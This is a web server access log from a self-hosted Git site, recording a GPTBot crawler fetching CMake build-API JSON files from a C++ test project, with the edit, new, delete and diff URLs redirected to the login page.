[Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 1009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11045] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9884] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35997] [Gzip 10.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:52:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11376] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 33010] [Gzip 23.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9896] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 13004] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 14168] [Gzip 8.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10530] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11366] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13839] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9886] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9887] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:29 +0000] - 303 303 - GET https 